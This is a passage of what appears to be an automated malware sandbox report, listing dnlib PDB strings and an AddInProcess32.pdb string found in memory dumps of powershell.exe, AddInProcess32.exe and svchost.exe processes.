            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 0000000A.00000002.3372031467.0000000003E07000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371896205.0000000003DE7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369020881.00000000017F7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3368884407.00000000017D7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369228393.0000000001817000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371223912.0000000003C17000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.000000000160D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3369907373.0000000003127000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3364606338.0000000001537000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371787930.0000000003DC7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371439220.0000000003C37000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3368577514.00000000017B7000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3371561302.0000000003C57000.00000040.10000000.00040000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3364223051.0000000001512000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2324999391.00000000029C2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000011.00000002.2401038340.0000000002882000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000017.00000002.2498372356.0000000002AC2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000001F.00000002.2602124639.0000000002A62000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000025.00000002.2696343691.0000000002E82000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000002C.00000002.2771398420.00000000027B2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000032.00000002.2867044582.00000000025E2000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000038.00000002.2943823106.0000000002D22000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000003E.00000002.3041192141.0000000002722000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000044.00000002.3147242188.0000000002D02000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 0000004A.00000002.3224086435.0000000002A32000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000050.00000002.3314541028.0000000002E32000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000056.00000002.3360669578.00000000032E2000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2452048534.00007FF848F10000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2452048534.00007FF848F10000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
